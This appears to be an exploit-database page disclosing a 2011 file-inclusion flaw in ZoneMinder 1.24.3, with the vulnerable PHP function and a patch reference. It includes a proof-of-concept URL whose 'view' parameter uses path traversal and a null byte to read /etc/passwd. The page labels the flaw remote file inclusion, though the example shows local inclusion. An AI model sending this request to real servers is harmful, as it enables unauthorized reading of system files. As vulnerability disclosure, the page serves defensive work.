header-logo
Suggest Exploit
vendor:
Zoneminder
by:
Iye
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Zoneminder
Affected Version From: 1.24.3
Affected Version To: 1.24.4
Patch Exists: YES
Related CWE: N/A
CPE: a:zoneminder:zoneminder:1.24.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu 10.04
2011

Zoneminder 1.24.3 Remote File Inclusion Vulnerability

A vulnerability in Zoneminder 1.24.3 allows an authenticated user to include remote files via a crafted URL. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'view' parameter of the 'index.php' script. An attacker can exploit this vulnerability to include arbitrary remote files and execute arbitrary code on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to apply the patch as soon as possible.
Source

Exploit-DB raw data:

# Exploit Title: Zoneminder 1.24.3 Remote File Inclusion Vulnerability
# Date: 2011-07-22
# Author: Iye (iye[dot]cba-at-gmail[dot]com)
# Software Link: http://www.zoneminder.com/
# Version: 1.24.3 (Tested). 1.24.4 probably too, not tested
# Tested on: Ubuntu 10.04

You must be authenticated as a user in the Web App to exploit it. It's
not a must to be admin.

POC: http://localhost/zm/index.php?action=56&markMids%5B%5D=1&deleteBtn=Delete&editBtn=Edit&view=../../../../../../../../../../../../../../../etc/passwd%00

Reported to proyect mantainer (Philip Coombes) on 2011-07-22
Fix patch made Philip Coombes: http://www.zoneminder.com/downloads/lfi-patch.txt

Vulnerable Code:

/var/www/zm/includes/functions.php
--------------------------------------------------------

function getSkinFile( $file )
{
    global $skinBase;
    $skinFile = false;
    foreach ( $skinBase as $skin )
    {
        $tempSkinFile = 'skins'.'/'.$skin.'/'.$file;
        if ( file_exists( $tempSkinFile ) )
            $skinFile = $tempSkinFile;
    }
    return( $skinFile );
}

--------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR